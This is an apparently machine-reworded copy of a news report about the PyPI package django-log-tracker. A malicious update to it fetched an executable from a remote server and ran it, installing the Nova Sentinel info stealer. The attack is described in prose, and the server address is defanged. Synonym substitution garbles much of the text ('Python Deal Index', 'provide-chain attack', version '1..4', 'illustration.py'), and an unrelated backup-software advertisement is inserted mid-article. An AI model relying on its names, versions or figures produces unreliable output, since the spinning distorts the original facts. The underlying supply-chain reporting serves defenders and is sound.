A dormant bundle offered on the Python Deal Index (PyPI) repository was current just about after two years to propagate an info stealer malware termed Nova Sentinel.
The deal, named django-log-tracker, was initially revealed to PyPI in April 2022, according to software package offer chain security business Phylum, which detected an anomalous update to the library on February 21, 2024.
When the connected GitHub repository hasn’t been up to date considering the fact that April 10, 2022, the introduction of a destructive update implies a probable compromise of the PyPI account belonging to the developer.

Protect and backup your data using AOMEI Backupper. AOMEI Backupper takes secure and encrypted backups from your Windows, hard drives or partitions. With AOMEI Backupper you will never be worried about loosing your data anymore.
Get AOMEI Backupper with 72% discount from an authorized distrinutor of AOMEI: SerialCart® (Limited Offer).
➤ Activate Your Coupon Code
Django-log-tracker has been downloaded 3,866 moments to date, with the rogue variation (1..4) downloaded 107 moments on the day it was revealed. The package deal is no extended available for download from PyPI.
“In the malicious update, the attacker stripped the package of most of its initial information, leaving only an __init__.py and illustration.py file at the rear of,” the business mentioned.
The variations, easy and self-explanatory, involve fetching an executable named “Updater_1.4.4_x64.exe” from a distant server (“45.88.180[.]54”), followed by launching it working with the Python os.startfile() functionality.
The binary, for its section, comes embedded with Nova Sentinel, a stealer malware that was 1st documented by Sekoia in November 2023 as remaining dispersed in the sort of bogus Electron apps on bogus websites offering online video recreation downloads.
“What is intriguing about this specific situation […] is that the attack vector appeared to be an attempted provide-chain attack via a compromised PyPI account,” Phylum explained.
“If this experienced been a definitely well-liked package, any challenge with this offer outlined as a dependency with out a edition specified or a versatile variation specified in their dependency file would have pulled the latest, destructive edition of this package.”
Found this write-up attention-grabbing? Stick to us on Twitter and LinkedIn to examine much more exceptional material we post.
Some parts of this post are sourced from:
thehackernews.com